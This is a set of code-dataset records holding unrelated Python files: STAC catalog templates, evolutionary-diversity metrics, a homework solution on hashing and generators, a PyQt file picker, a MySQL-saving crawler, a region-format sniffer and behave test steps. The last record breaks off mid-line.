\"pan\"\n}\n\nproj_epsg = {f\"utm{str(i).zfill(2)}\": 26900 + i for i in range(1, 25)}\nproj_epsg[\"lcc00\"] = 3979\n\nspot_catalog = Catalog(\n id=\"nrcan-spot-ortho\",\n description=\"STAC Catalog for orthorectified SPOT 4 and 5 data of Canada\",\n title=\"STAC Catalog for orthorectified SPOT 4 and 5 data of Canada\",\n stac_extensions=None)\n\nspot45_catalog = Catalog(\n id=\"canada-spot-orthoimages\",\n description=\"STAC Catalog for orthorectified SPOT 4 and 5 data of Canada\",\n title=\"STAC Catalog for orthorectified SPOT 4 and 5 data of Canada\",\n stac_extensions=None)\n\ngeobase_providers = [\n Provider(\n \"Government of Canada\",\n \"Natural Resources; Strategic Policy and Results Sector\",\n [\"licensor\", \"processor\"],\n \"https://open.canada.ca/data/en/dataset/d799c202-603d-4e5c-b1eb-d058803f80f9\"\n ),\n Provider(\"PCI Geomatics\", \"info@pci.com\", [\"processor\", \"host\"],\n \"www.pcigeomatics.com\"),\n Provider(\"Sparkgeo\", \"info@sparkegeo.com\", [\"processor\", \"host\"],\n \"www.sparkgeo.com\"),\n]\n\ngeobase_license = Link(\n \"license\",\n \"https://open.canada.ca/en/open-government-licence-canada\",\n \"text\",\n \"Open Government Licence Canada\",\n)\n\nspot_extents = Extent(\n SpatialExtent([[\n 35.324804300674494, -169.69075486542908, 68.02144065697097,\n -15.505275588132838\n ]]),\n TemporalExtent([[\n datetime.strptime(\"2005-05-01\", \"%Y-%m-%d\"),\n datetime.strptime(\"2010-10-31\", \"%Y-%m-%d\"),\n ]]),\n)\n\nspot_bands = {\n \"B1\":\n Band(\n dict(name=\"B1\",\n common_name=\"green\",\n description=\"Green: 500-590nm\",\n center_wavelength=0.545,\n full_width_half_max=0.09)),\n \"B2\":\n Band(\n dict(name=\"B2\",\n common_name=\"red\",\n description=\"Red: 610-680 nm\",\n center_wavelength=0.645,\n full_width_half_max=0.07)),\n \"B3\":\n Band(\n dict(name=\"B3\",\n common_name=\"nir\",\n description=\"Near Infrared: 780-890 nm\",\n center_wavelength=0.835,\n full_width_half_max=0.11)),\n \"B4\":\n Band(\n dict(name=\"B4\",\n common_name=\"swir16\",\n description=\"ShortWave Infrared: 1580-1750 nm\",\n center_wavelength=1.665,\n full_width_half_max=0.170)),\n}\n\nspot_pan = {\n \"S4\":\n Band(\n dict(name=\"pan\",\n common_name=\"pan\",\n description=\"Panchromatic: 610-680 nm\",\n center_wavelength=0.645,\n full_width_half_max=0.07)),\n \"S5\":\n Band(\n dict(name=\"pan\",\n common_name=\"pan\",\n description=\"Panchromatic: 480-710 nm\",\n center_wavelength=0.595,\n full_width_half_max=0.230))\n}\n\nspot4_collection = Collection(\n id=\"canada-spot4-orthoimages\",\n description=\"SPOT 4 orthoimages of Canada\",\n extent=spot_extents,\n title=\"SPOT 4 orthoimages of Canada\",\n stac_extensions=[\n \"https://stac-extensions.github.io/eo/v1.0.0/schema.json\",\n \"https://stac-extensions.github.io/projection/v1.0.0/schema.json\",\n ],\n license=\"Proprietery\",\n keywords=[\"SPOT\", \"Geobase\", \"orthoimages\"],\n providers=geobase_providers,\n summaries=Summaries(\n dict(\n platform=[\"SPOT 5\"],\n instruments=[\"HRVIR\"],\n constellation=[\"SPOT\"],\n gsd=[10, 20],\n )))\neo_ext = SummariesEOExtension(spot4_collection)\neo_ext.bands = list(spot_bands.values()) + [spot_pan[\"S4\"]]\nproj_ext = SummariesProjectionExtension(spot4_collection)\nproj_ext.epsg = list(proj_epsg.values())\n\nspot5_collection = Collection(\n id=\"canada-spot5-orthoimages\",\n description=\"SPOT 5 orthoimages of Canada\",\n extent=spot_extents,\n title=\"SPOT 5 orthoimages of Canada\",\n stac_extensions=[\n \"https://stac-extensions.github.io/eo/v1.0.0/schema.json\",\n \"https://stac-extensions.github.io/projection/v1.0.0/schema.json\",\n ],\n license=\"Proprietery\",\n keywords=[\"SPOT\", \"Geobase\", \"orthoimages\"],\n providers=geobase_providers,\n summaries=Summaries(\n dict(\n platform=[\"SPOT 5\"],\n instruments=[\"HVG\"],\n constellation=[\"SPOT\"],\n gsd=[2.5, 5, 10, 20],\n )))\neo_ext = SummariesEOExtension(spot5_collection)\neo_ext.bands = list(spot_bands.values()) + [spot_pan[\"S5\"]]\nproj_ext = SummariesProjectionExtension(spot5_collection)\nproj_ext.epsg = list(proj_epsg.values())\n\n\ndef build_root_catalog():\n spot4_collection.add_link(geobase_license)\n spot5_collection.add_link(geobase_license)\n spot_catalog.add_child(spot45_catalog)\n spot45_catalog.add_child(spot4_collection)\n spot45_catalog.add_child(spot5_collection)\n return spot_catalog\n","sub_path":"src/stactools/nrcan_spot_ortho/stac_templates.py","file_name":"stac_templates.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"427221583","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom sys import maxsize\n\n\nfrom editdistance import eval\n\n# levenshtein distance between two genomes: used codons + tail\ndef genome_distance(ind1, ind2):\n return eval(ind1.genome, ind2.genome)\n \ndef genome_diff(ind1, ind2):\n return genome_distance(ind1, ind2) / max(len(ind1.genome), len(ind2.genome))\n \n# levenshtein distance between two effected regions in two genomes: used_codon + \ndef effective_region_distance(ind1, ind2):\n return eval(ind1.genome[:ind1.used_codons], ind2.genome[:ind2.used_codons])\n \ndef effective_region_diff(ind1, ind2):\n return effective_region_distance(ind1, ind2) / max(ind1.used_codons, ind2.used_codons)\n\n# genome disversity of the population \ndef genome_diversity(population):\n diversity = 0.0\n for i in range(len(population)-1):\n for j in range(i+1, len(population)):\n# diversity += genome_distance(population[i], population[j])\n diversity += genome_diff(population[i], population[j])\n \n # average the distance\n diversity = diversity / (len(population) * (len(population) - 1)) * 2\n \n return diversity\n\n# population diveristy in terms of used_codons \ndef effective_diversity(population):\n diversity = 0.0\n for i in range(len(population)-1):\n for j in range(i+1, len(population)):\n# diversity += effected_region_distance(population[i], population[j])\n diversity += effective_region_diff(population[i], population[j])\n \n # average the distance\n diversity = diversity / (len(population) * (len(population) - 1)) * 2\n \n return diversity\n\n\n\ndef hamming(list1, list2):\n if (len(list1) != len(list2)):\n return max(len(list1), len(list2))\n #assert len(list1) == len(list2)\n return sum(c1 != c2 for c1, c2 in zip(list1, list2))\n \n# use hamming distance for dissimilarity \ndef semantic_dissimilarity(ind1, ind2):\n if (len(ind1.semantic) == len(ind2.semantic) == 0):\n return 0.0\n \n return hamming(ind1.semantic, ind2.semantic) / max(len(ind1.semantic), len(ind2.semantic))\n \n \n# use mean absolute distance for semantic distance \ndef semantic_distance(ind1, ind2):\n \n if (len(ind1.semantic) == len(ind2.semantic) == 0):\n return 0.0 \n \n \n if len(ind1.semantic) == 0:\n return np.nanmean(ind2.semantic)\n elif len(ind1.semantic) == 0:\n return np.nanmean(ind1.semantic())\n else:\n return np.nanmean([abs(s1 - s2) for s1,s2 in zip(ind1.semantic, ind2.semantic)])\n\n \ndef semantic_diversity(population):\n diversity = 0.0\n for i in range(len(population)-1):\n for j in range(i+1, len(population)):\n #diversity += semantic_dissimilarity(population[i], population[j])\n diversity += semantic_distance(population[i], population[j])\n \n diversity = diversity / (len(population) * (len(population) - 1)) * 2\n \n diversity = round(diversity, 3)\n \n return diversity\n\n \ndef semantic_dispersion(population):\n semantic_array = np.array([ind.semantic for ind in population if len(ind.semantic) != 0])\n #print(semantic_array)\n \n #print(semantic_array.shape)\n \n semantic_mean = np.mean(semantic_array, axis=0)\n #print(\"Mean of semantic\", semantic_mean)\n #semantic_std = np.std(semantic_array, axis=0)\n \n # use ddof=1 to specify sample variance, rather than population variane (ddof=0))\n # semantic_var = np.var(semantic_array, axis=0, ddof=1)\n \n \n dispersion = 0.0\n \n for semantic in semantic_array:\n dispersion += np.sqrt(sum((semantic - semantic_mean)**2))\n \n dispersion /= len(semantic_array)\n \n dispersion = round(dispersion, 3)\n \n return dispersion\n \n# Tree edit distance between two individuals\n \n'''def tree_diversity(population):\n diversity = 0.0\n for i in range(len(population) - 1):\n for j in range(i+1, len(population)):\n diversity += population[i].tree_edit_distance(population[j])\n \n diversity = diversity / (len(population) * (len(population)-1)) * 2\n\n return diversity '''\n \ndef tree_diversity(population):\n diversity = 0.0\n best = max(population)\n for i in range(len(population)):\n diversity += population[i].tree_edit_distance(best)\n diversity = diversity / len(population)\n return diversity\n \n# Phenotype diveristy = no of unique fitnesses \ndef phenotype_diversity(population):\n unique_fitnesses = set([ind.fitness for ind in population])\n \n diversity = len(unique_fitnesses) / len(population)\n \n return diversity\n \n","sub_path":"src/operators/diversity.py","file_name":"diversity.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"530562542","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n# Reorder the query based on results and relevance feedback\r\n# Simply call set_order with parameters of current query and the query results( with relevance feedback ) \r\n# to get best query for next iteration( reordered query )\r\n\r\nimport urllib2\r\nimport base64\r\nimport json\r\nimport sys\r\nimport string\r\nimport operator\r\nimport re\r\n\r\ndef set_order(keywords, results):\r\n matrix = dict()\r\n for word1 in keywords:\r\n matrix[word1] = dict()\r\n for word2 in keywords:\r\n if word2 != word1:\r\n matrix[word1][word2] = 0\r\n for item in results:\r\n #print word1.lower()+\".{0,17}\"+word2.lower()\r\n remode = word1.lower()+\".{1,5}\"+word2.lower()\r\n if re.search(remode,item[u'Description'].encode('utf-8').lower()) or re.search(remode,item[u'Title'].encode('utf-8').lower()):\r\n #print \"Got you!!!!\"\r\n if item[u'relevant']:\r\n matrix[word1][word2] = matrix[word1][word2] + 1\r\n else:\r\n matrix[word1][word2] = matrix[word1][word2] - 1\r\n best_query = keywords\r\n score = 0\r\n #print keywords\r\n for word1 in keywords:\r\n words_list = keywords[:]\r\n query = [word1]\r\n words_list.remove(word1)\r\n curr_word = word1\r\n while len(query) < len(keywords):\r\n #print query\r\n #print words_list\r\n word_to_add = None\r\n for word2 in words_list:\r\n if word2 not in query and ( word_to_add==None or ( matrix[curr_word].has_key(word2) and matrix[curr_word][word2]>matrix[curr_word][word_to_add] ) ):\r\n word_to_add = word2\r\n #print word_to_add\r\n query.append(word_to_add)\r\n words_list.remove(word_to_add)\r\n curr_word = word_to_add\r\n the_score = 0\r\n for i in range(len(query)-1):\r\n #print i\r\n the_score = the_score + matrix[query[i]][query[i+1]]\r\n #print the_score\r\n if the_score > score:\r\n best_query = query\r\n score = the_score\r\n return best_query\r\n\r\n\r\n\r\nif __name__ ==\"__main__\":\r\n pass\r\n","sub_path":"keyword_order.py","file_name":"keyword_order.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271186035","text":"# Skeleton file for HW6 - Spring 2021 - extended intro to CS\r\n\r\n# Add your implementation to this file\r\n\r\n# You may add other utility functions to this file,\r\n# but you may NOT change the signature of the existing ones.\r\n\r\n# Change the name of the file to include your ID number (hw6_ID.py).\r\n\r\n# Enter all IDs of participating students as strings, separated by commas.\r\n\r\n# For example: SUBMISSION_IDS = [\"123456\", \"987654\"] if submitted in a pair or SUBMISSION_IDS = [\"123456\"] if submitted alone.\r\n\r\nSUBMISSION_IDS = [\"206962359\", \"316296771\"]\r\n\r\n\r\nimport random\r\n\r\n\r\n############\r\n# QUESTION 1\r\n############\r\n\r\n# Q1 a\r\ndef prefix_suffix_overlap(lst, k):\r\n\tresult_list = []\r\n\tfor i in range(len(lst)):\r\n\t\tfor j in range(len(lst)):\r\n\t\t\tif i != j:\r\n\t\t\t\tif (lst[i][:k] == lst[j][-k:]):\r\n\t\t\t\t\tresult_list.append((i,j))\r\n\treturn result_list\r\n\r\n\r\n# Q1 c\r\nclass Dict:\r\n\tdef __init__(self, m, hash_func=hash):\r\n\t\t\"\"\" initial hash table, m empty entries \"\"\"\r\n\t\tself.table = [[] for i in range(m)]\r\n\t\tself.hash_mod = lambda x: hash_func(x) % m\r\n\r\n\tdef __repr__(self):\r\n\t\tL = [self.table[i] for i in range(len(self.table))]\r\n\t\treturn \"\".join([str(i) + \" \" + str(L[i]) + \"\\n\" for i in range(len(self.table))])\r\n\r\n\tdef insert(self, key, value):\r\n\t\t\"\"\" insert key,value into table\r\n\t\t\tAllow repetitions of keys \"\"\"\r\n\t\ti = self.hash_mod(key) # hash on key only\r\n\t\titem = [key, value] # pack into one item\r\n\t\tself.table[i].append(item)\r\n\r\n\tdef find(self, key):\r\n\t\t\"\"\" returns ALL values of key as a list, empty list if none \"\"\"\r\n\t\tresult_lst = []\r\n\t\ti = self.hash_mod(key)\r\n\t\tfor curr in self.table[i]:\r\n\t\t\tif curr[0] == key:\r\n\t\t\t\tresult_lst.append(curr[1])\r\n\t\treturn result_lst\r\n\r\n\r\n\r\n# Q1 d\r\ndef prefix_suffix_overlap_hash1(lst, k):\r\n\tresult_lst = []\r\n\td = Dict(len(lst))\r\n\r\n\t# O(nk)\r\n\tfor i in range(len(lst)): # n iterations\r\n\t\td.insert(lst[i][:k],i) # O(k) - slicing, O(1) - insert(average)\r\n\r\n\t# O(nk)\r\n\tfor j in range(len(lst)): # n iterations\r\n\t\tmatch_indexes = d.find(lst[j][-k:]) # O(k) - slicing, O(1) - find(average)\r\n\t\tfor index in match_indexes: # Q1-e: never happens\r\n\t\t\tif index != j:\r\n\t\t\t\tresult_lst.append((index,j))\r\n\r\n\treturn result_lst # Q1-e: empty list\r\n\t\t\r\n\r\n\t\r\n############\r\n# QUESTION 2\r\n############\r\n\r\n# Q2 a\r\ndef powers_of_2():\r\n\tnumber = 1\r\n\twhile True:\r\n\t\tyield number # starting 2^0\r\n\t\tnumber = number * 2\r\n\r\n\r\n# Q2 b\r\ndef pi_approx_monte_carlo():\r\n\tpower_gen = powers_of_2()\r\n\tnum_inside, total_amount = 0,0\r\n\twhile True:\r\n\t\tcurr_power = next(power_gen)\r\n\t\tfor i in range(curr_power):\r\n\t\t\tx = random.random()\r\n\t\t\ty = random.random()\r\n\t\t\tif x**2 + y**2 <= 1.0:\r\n\t\t\t\tnum_inside +=1\r\n\t\ttotal_amount += curr_power\r\n\t\tyield (4*num_inside/total_amount)\r\n\r\n# Q2 c\r\ndef leibniz():\r\n\tn = 0\r\n\twhile True:\r\n\t\tyield ((-1)**n)/(2*n+1)\r\n\t\tn +=1\r\n\r\ndef infinite_series(gen):\r\n\tsum_of_gen = 0\r\n\tfor num in gen:\r\n\t\tsum_of_gen += num\r\n\t\tyield sum_of_gen\r\n\r\n\r\ndef pi_approx_leibniz():\r\n\tleb_gen = leibniz()\r\n\tsum_gen = infinite_series(leb_gen)\r\n\tpower_gen = powers_of_2()\r\n\twhile True:\r\n\t\tfor i in range(next(power_gen)-1):\r\n\t\t\tnext(sum_gen)\r\n\t\tyield 4*next(sum_gen)\r\n\r\n\r\n# Q2 d\r\ndef unit_slicing():\r\n\tpower_gen = powers_of_2()\r\n\twhile True:\r\n\t\tpower = next(power_gen)\r\n\t\tlst_res = [(i/power) for i in range(power)]\r\n\t\tyield lst_res\r\n\t\t\t\t\r\n\r\n\r\ndef integral(func, a, b):\r\n\tpower_gen = powers_of_2()\r\n\twhile True:\r\n\t\tintegral_sum = 0\r\n\t\tpower = next(power_gen)\r\n\t\twidth = (b-a)/ power\r\n\t\tfor i in range(power):\t \r\n\t\t\tintegral_sum += func(a+width*i)*((a+width*(i+1))-(a+width*i))\r\n\t\tyield integral_sum\r\n\r\ndef pi_approx_integral():\r\n\tintegral_gen = integral((lambda x: (1-x**2)**0.5),-1,1)\r\n\twhile True:\r\n\t\tyield 2* next(integral_gen)\r\n\r\n\r\n############\r\n# QUESTION 6\r\n############\r\n\r\n\r\n# Q6 c\r\ndef CYK_d(st, rule_dict, start_var):\r\n\t''' can string st be generated from grammar? '''\r\n\tn = len(st)\r\n\r\n\t# table for the dynamic programming algorithm\r\n\ttable = [[None for j in range(n+1)] for i in range(n)]\r\n\t#Initialize the relevant triangular region with empty sets\r\n\tfor i in range(n):\r\n\t\tfor j in range(i+1,n+1):\r\n\t\t\ttable[i][j] = [set(), \"none\"]\r\n\r\n\t# Fill the table cells representing substrings of length 1\r\n\tfill_length_1_cells_d(table, rule_dict, st)\r\n \r\n\t# Fill the table cells representing substrings of length >=2\r\n\tfor length in range(2, n+1):\r\n\t\tfor i in range(0, n-length+1):\r\n\t\t\tj = i+length\r\n\t\t\tfill_cell_d(table, i,j, rule_dict)\r\n\t\t\t\r\n\tif (start_var in table[0][n][0]) == False:\r\n\t\treturn -1\r\n\telse:\r\n\t\treturn table[0][n][1]\r\n\r\ndef fill_length_1_cells_d(table, rule_dict, st):\r\n\tn = len(st)\r\n\tfor i in range(n):\r\n\t\tfor lhs in rule_dict: # lhs is a single variable\r\n\t\t\tif st[i] in rule_dict[lhs]:\r\n\t\t\t # add variable lhs to T[i][i+1]\r\n\t\t\t table[i][i+1][0].add(lhs)\r\n\t\ttable[i][i+1][1] = 1\r\n\r\n\r\ndef fill_cell_d(table, i, j, rule_dict):\r\n\tfor k in range(i+1, j): # non trivial partitions of s[i:j]\r\n\t\tfor lhs in rule_dict: # lhs is a single variable\r\n\t\t\tfor rhs in rule_dict[lhs]:\r\n\t\t\t\tif len(rhs) == 2: # rule like A -> XY (not like A -> a)\r\n\t\t\t\t\tX, Y = rhs[0], rhs[1]\r\n\t\t\t\t\tif X in table[i][k][0] and Y in table[k][j][0]:\r\n\t\t\t\t\t\ttable[i][j][0].add(lhs)\r\n\t\t\t\t\t\tif table[i][j][1] == \"none\":\r\n\t\t\t\t\t\t\ttable[i][j][1] = max(1+table[i][k][1],1+table[k][j][1])\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\ttable[i][j][1] = min(table[i][j][1], max(1+table[i][k][1],1+table[k][j][1]))\r\n\r\n\r\n########\r\n# Tester\r\n########\r\n\r\ndef test():\r\n\timport math\r\n\r\n\t############\r\n\t# QUESTION 1\r\n\t############\r\n\r\n\t# Q1 a\r\n\tlst = [\"abcd\", \"cdab\", \"aaaa\", \"bbbb\", \"abff\"]\r\n\tk = 2\r\n\tif sorted(prefix_suffix_overlap(lst, k)) != sorted([(0, 1), (1, 0), (4, 1)]):\r\n\t\tprint(\"error in prefix_suffix_overlap\")\r\n\t# Q1 c\r\n\td = Dict(3)\r\n\td.insert(\"a\", 56)\r\n\td.insert(\"a\", 34)\r\n\tif sorted(d.find(\"a\")) != sorted([56, 34]) or d.find(\"b\") != []:\r\n\t\tprint(\"error in Dict.find\")\r\n\r\n \r\n\t# Q1 d\r\n\tlst = [\"abcd\", \"cdab\", \"aaaa\", \"bbbb\", \"abff\"]\r\n\tk = 2\r\n\tif sorted(prefix_suffix_overlap_hash1(lst, k)) != sorted([(0, 1), (1, 0), (4, 1)]):\r\n\t\tprint(\"error in prefix_suffix_overlap_hash1\")\r\n\r\n\r\n\r\n\t############\r\n\t# QUESTION 2\r\n\t############\r\n\r\n\t# Q2 a\r\n\tgen = powers_of_2()\r\n\tif [next(gen) for i in range(5)] != [1, 2, 4, 8, 16]:\r\n\t\tprint('error in powers_of_2')\r\n\t\r\n\r\n\t# Q2 b\r\n\tgen = pi_approx_monte_carlo()\r\n\tfirst_apporx = next(gen)\r\n\t[next(gen) for i in range(8)]\r\n\ttenth_approx = next(gen)\r\n\t[next(gen) for i in range(9)]\r\n\ttwentyth_approx = next(gen)\r\n\tif abs(first_apporx - math.pi) < abs(tenth_approx - math.pi) or \\\r\n\t\t\tabs(tenth_approx - math.pi) < abs(twentyth_approx - math.pi) or \\\r\n\t\t\tabs(twentyth_approx - math.pi) > 0.01:\r\n\t\tprint('error in pi_approx_monte_carlo')\r\n \r\n\t# Q2 c\r\n\tgen = leibniz()\r\n\tif [next(gen) for i in range(5)] != [1, -1/3, 1/5, -1/7, 1/9]:\r\n\t\tprint('error in leibniz')\r\n\r\n\tgen = infinite_series(powers_of_2())\r\n\tif [next(gen) for i in range(6)] != [1, 3, 7, 15, 31, 63]:\r\n\t\tprint('error in infinite_series')\r\n\r\n\tleibniz_formula = [1, -1/3, 1/5, -1/7, 1/9, -1/11, 1/13, -1/15, 1/17, -1/19, 1/21, -1/23, 1/25, -1/27, 1/29]\r\n\tleibniz_sum_powers_of_2 = [4*leibniz_formula[0], 4*sum(leibniz_formula[:3]), 4*sum(leibniz_formula[:7]), 4*sum(leibniz_formula[:15])]\r\n\tgen = pi_approx_leibniz()\r\n\tfirst_4_sums = [next(gen) for i in range(4)]\r\n\t[next(gen) for i in range(5)]\r\n\ttenth_approx = next(gen)\r\n\tif first_4_sums != leibniz_sum_powers_of_2 or abs(tenth_approx - math.pi) > 1e-3:\r\n\t\tprint('error in pi_approx_leibniz')\r\n\r\n\t# Q2 d\r\n\tgen = unit_slicing()\r\n\tif [next(gen) for i in range(4)] != [[0.0], [0.0, 0.5], [0.0, 0.25, 0.5, 0.75], [0.0, 0.125, 0.25, 0.375, 0.5, 0.625, 0.75, 0.875]]:\r\n\t\tprint('error in unit_slicing')\r\n\r\n\tb = 10\r\n\ttrue_val = math.log(b)\r\n\tgen = integral(lambda x: 1 / x, 1, b)\r\n\tfirst_apporx = next(gen)\r\n\t[next(gen) for i in range(8)]\r\n\ttenth_approx = next(gen)\r\n\t[next(gen) for i in range(9)]\r\n\ttwentyth_approx = next(gen)\r\n\tif abs(first_apporx - true_val) < abs(tenth_approx - true_val) or \\\r\n\t\t\tabs(tenth_approx - true_val) < abs(twentyth_approx - true_val) or \\\r\n\t\t\tabs(twentyth_approx - true_val) > 1e-4:\r\n\t\tprint('error in integral')\r\n\t\r\n\tgen = pi_approx_integral()\r\n\tfirst_apporx = next(gen)\r\n\t[next(gen) for i in range(8)]\r\n\ttenth_approx = next(gen)\r\n\t[next(gen) for i in range(9)]\r\n\ttwentyth_approx = next(gen)\r\n\tif abs(first_apporx - math.pi) < abs(tenth_approx - math.pi) or \\\r\n\t\t\tabs(tenth_approx - math.pi) < abs(twentyth_approx - math.pi) or \\\r\n\t\t\tabs(twentyth_approx - math.pi) > 1e-5:\r\n\t\tprint('error in pi_approx_integral')\r\n\r\n\t############\r\n\t# QUESTION 6\r\n\t############\r\n\r\n\t# Q6 c\r\n\trule_dict = {\"S\": {\"AB\", \"BC\"}, \"A\": {\"BA\", \"a\"}, \"B\": {\"CC\", \"b\"}, \"C\": {\"AB\", \"a\"}}\r\n\tif CYK_d(\"baaba\", rule_dict, \"S\") != 4:\r\n\t\tprint(\"Error in CYK_d1\")\r\n\r\n\tif CYK_d(\"baab\", rule_dict, \"S\") != -1:\r\n\t\tprint(\"Error in CYK_d2\")\r\n\t\t","sub_path":"hw6_206962359_original.py","file_name":"hw6_206962359_original.py","file_ext":"py","file_size_in_byte":8634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"497921046","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nZetCode PyQt5 tutorial\n\nThis example shows text which\nis entered in a QLineEdit\nin a QLabel widget.\n\nAuthor: Jan Bodnar\nWebsite: zetcode.com\nLast edited: August 2017\n\"\"\"\n\nimport sys\nimport os\nfrom PyQt5.QtWidgets import (QWidget, QApplication, QPushButton, QFileDialog)\n\n\n\n\n\nclass Example(QWidget):\n\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n\n def initUI(self):\n self.setGeometry(300, 300, 280, 170)\n self.setWindowTitle(\"File picker\")\n btn = QPushButton(\"Choose a file\", self)\n btn.clicked.connect(self.openFile)\n btn.setGeometry(100, 50, 100, 40)\n\n self.show()\n\n\n def openFile(self):\n name = QFileDialog.getOpenFileName(self, \"Choose file\")\n print(name)\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())","sub_path":"PycharmProjects/qtDesigner/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"175311242","text":"import os, sys, json, unittest\nfrom package.code.exceptions import *\nfrom package.code.logger import Logger \n\n\ndef loadSettings():\n with open('package/settings.json', 'r') as jfile:\n loaded_data = json.load(jfile)\n\n curr_path = '/'.join(os.path.realpath(__file__).split('\\\\')[:-1])\n loaded_data['logpath'] = '{}/{}'.format(curr_path, loaded_data['logpath'])\n \n return loaded_data\n\ndef testModules():\n import package.test.LoggerTester as TestLogger\n loader = unittest.TestLoader()\n suite = unittest.TestSuite()\n\n suite.addTests(loader.loadTestsFromModule(TestLogger))\n\n runner = unittest.TextTestRunner(verbosity = 3)\n result = runner.run(suite)\n\nif __name__ == '__main__':\n settings = loadSettings()\n syslog = Logger(settings)\n syslog.logAction(\"Main initiated.\")\n \n try:\n for sysarg in sys.argv[1:]:\n if sysarg == '-t' or sysarg == '-test':\n syslog.logAction(\"Testing procedures initiated.\")\n testModules()\n syslog.logAction(\"Test fixtures executed successfully.\")\n elif sysarg == '-c' or sysarg == '-clear':\n with open(syslog.log_path, 'w') as lfile:\n lfile.write(\"\")\n syslog.logAction(\"Log file purged.\")\n else:\n raise MPArgvException\n except Exception as e:\n syslog.logAction(e)\n syslog.logAction(\"Ended with failure.\")\n finally:\n syslog.logAction('Main End.\\n')\n syslog.writeOut() \n ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"25064244","text":"# -*- encoding=utf-8 -*-\n\nimport pymysql\n\n\ndef get_conn():\n conn = pymysql.connect(\n host=\"localhost\",\n port=3306,\n user=\"yjy\",\n passwd=\"yyyyyy\",\n db=\"yjy\",\n charset=\"utf8\"\n )\n return conn\n\n\ndef save(data):\n \"\"\"\n 插入数据库\n :param data: (dict) link:链接 data:内容\n :return:\n \"\"\"\n conn = get_conn()\n cur = conn.cursor()\n if data and data.get(\"data\"):\n try:\n sql = \"insert into cnblogs (c_link,c_data) values (%s, %s)\"\n cur.execute(sql, (data.get(\"link\"), data.get(\"data\")))\n except Exception as e:\n print(str(e)[:50])\n finally:\n conn.commit()\n cur.close()\n conn.close()\n\n\ndef check_link(link):\n \"\"\"\n 检查url是否符合条件,并检查是否重复\n :param link:\n :return: True:符合条件 False:不符合条件\n \"\"\"\n flag = False\n conn = get_conn()\n cur = conn.cursor()\n try:\n sql = 'select count(*) from cnblogs where c_link = %s'\n cur.execute(sql, (link,))\n res = cur.fetchone()\n if res[0] == 0:\n flag = True\n except Exception as e:\n print(str(e)[:50])\n finally:\n cur.close()\n conn.close()\n return flag\n\n\n","sub_path":"Web/Crawler/Cnblogs/save_data.py","file_name":"save_data.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"20130838","text":"\"\"\"Utilities.\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nimport functools\nimport re\n\nfrom Bio.File import as_handle\n\n\ndef report_bad_line(line_parser):\n @functools.wraps(line_parser)\n def wrapper(line):\n try:\n return line_parser(line)\n except ValueError:\n raise ValueError(\"Bad line: %r\" % line)\n return wrapper\n\n\ndef sniff_region_format(fname):\n \"\"\"Guess whether the file format is BED, Picard interval list, or text.\n\n Returns a tuple of the format name (str) or None if the file is empty.\n \"\"\"\n with as_handle(fname, 'rU') as handle:\n for line in handle:\n if not line.strip():\n continue\n if '\\t' not in line and ':' in line and '-' in line:\n return 'text'\n if line.startswith('@') or re.match('\\w+\\t\\d+\\t\\d+\\t(\\+|-|\\.)\\t\\S+',\n line):\n return 'interval'\n if line.startswith('track') or line.count('\\t') > 1:\n return 'bed'\n raise ValueError(\"File \" + repr(fname) + \" does not appear to \"\n + \"be BED, interval list, or 'chr:start-end' \"\n + \"text!\\nFirst non-blank line: \" + repr(line))\n","sub_path":"cnvlib/tabio/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"50462441","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 26 de abr de 2018\n\n@author: koliveirab\n'''\nfrom behave import *\nfrom time import sleep\n\n@given(\"Inserimos o valor {primeiro}\")\ndef inserir_valor(context,primeiro):\n sleep(2)\n context.calc.clica(\"1\",\"name\")\n sleep(2)\n context.calc.clica(primeiro,tipo=\"name\")\n \n \n@when(\"quando temos a {operador} do primeiro com {segundo}\")\ndef operamos(context,operador,segundo):\n elemento=context.operador.operador(operador)\n context.calc.clica(elemento,\"name\")\n context.calc.clica(segundo,\"name\")\n \n@then(\"teremos o resultado:{resultado}\")\ndef resultado(context,resultado):\n context.calc.clica(\"=\",tipo=\"name\")\n resultados=context.calc.pegar_texto(\"CalcText\",\"id\")\n result=context.asserts.verifica_valor(resultados,resultado)\n \n \n@given(\"Zeramos o nosso contador\")\n@when(\"Inserimos o primeiro valor\")\n@when(\"Somamos o segundo Valor\")\n@then(\"Temos o valór de :\")\n@then(\"e diferente de zero\")\ndef step(context):\n pass","sub_path":"steps/steps.py","file_name":"steps.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"274071202","text":"\n\n#######\n\"\"\"\nNa dwóch listach z plików 'meetup_list.csv' i 'meetup_list2.csv' występują powtórki.\nPotrzebujemy mieć jedną, spójną listę, posortowaną alfabetycznie dla sprawnego przeprowadzenia rejestracji.\nZaczytaj dane, wyrzuć powtórki, skompiluj w jedną listę i wypisz.\n\"\"\"\n\n#######\n\nfacebook_list = 